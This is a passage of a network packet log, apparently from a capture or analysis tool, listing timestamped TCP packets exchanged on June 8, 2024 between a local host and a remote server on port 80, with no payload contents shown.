Jun 8, 2024 20:22:05.657840967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658060074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658094883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658117056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658128977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658135891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658164024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658175945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658199072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658206940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658232927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658242941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658269882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658289909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658307076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658327103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658343077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658358097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658379078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658391953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658413887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658428907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658448935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658463955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658482075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658499002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658516884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658533096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658545971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658566952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658581018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658598900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658617973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658632994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658653021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658672094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658688068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658704042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658723116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658736944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658757925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658771038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658791065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658807039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658827066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658840895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658859968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658874035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658895016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658910036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658931017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658946991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.658967018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.658982992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659003019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659017086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659039021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659053087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659074068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659087896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659111023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659123898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659145117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659162045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659181118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659195900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659215927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659230947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659251928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659266949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659287930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659302950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659332037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659336090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659368038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659383059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659404039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659420013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659439087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659454107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659487009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659503937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659538031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659552097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659574032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659589052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659610033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659626007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659646034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659660101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659681082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659698009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659714937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659730911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659749985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659764051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659785032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659801006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659817934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659836054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659857035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659866095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659890890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659903049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659924984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659935951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659957886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.659975052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.659992933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660007954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660027027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660041094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660062075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660077095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660096884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660111904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660134077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660147905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660168886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660185099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660202980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660218000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660238028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660259962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660274029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660288095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660310030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660325050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660346031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660360098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660378933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660399914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660413980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660424948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660448074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660465956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660505056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660511017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660542011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660554886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660578012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660593033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660615921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660635948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660649061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660659075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660682917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660696983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660718918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660732985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660753012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660770893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660789013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660793066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660821915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660834074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660857916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660872936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660892010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660908937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660927057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660942078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660962105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.660975933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.660995960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661015034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661039114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661048889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661073923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661091089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661108017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661124945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661144018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661159039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661197901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661211014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661236048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661247969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661272049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661284924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661308050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661318064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661343098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661360025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661377907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661391973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661413908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661428928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661448956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661463022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661484003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661499023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661521912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661535025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661557913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661571980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661592960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661607027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661627054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661642075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661663055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661676884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661699057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661712885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661734104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661750078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661768913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661781073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661804914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661818981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661839962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661854982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661878109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661890984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661911964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661928892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661947012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661961079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.661982059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.661997080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.662017107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.662031889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.662053108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.662062883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.662090063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.662103891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.662125111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.662141085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.662158012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.662177086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.662206888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.717812061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.724567890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.966444969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.966500044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.966583014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.966583014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.966592073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.966733932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.966775894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.966835022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.966962099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967019081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967231035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967267990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967288971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967308044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967325926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967365026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967777967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967812061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967840910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967847109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967878103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967885017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967900038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967922926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967933893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967955112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.967978954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.967989922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968017101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968055010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968271017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968302011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968334913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968336105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968358040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968370914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968399048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968404055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968421936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968441010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968465090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968472958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968502998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968524933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968537092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968571901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968596935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968621016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968875885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968893051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968907118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968924046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968940020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968941927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968941927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968956947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968967915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.968974113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.968990088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969007015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969007969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969007969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969027996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969049931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969049931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969621897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969680071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969753027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969769955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969784975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969800949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969815969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969816923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969815969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969835043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969844103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969844103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969851971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969865084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969870090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.969890118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969890118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.969908953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970635891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970652103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970668077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970685005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970696926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970700979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970716000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970717907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970732927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970741034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970748901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970762014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970767975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.970787048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970812082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.970812082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.971543074 CEST	80	49731	23.88.106.134	192.168.2.4
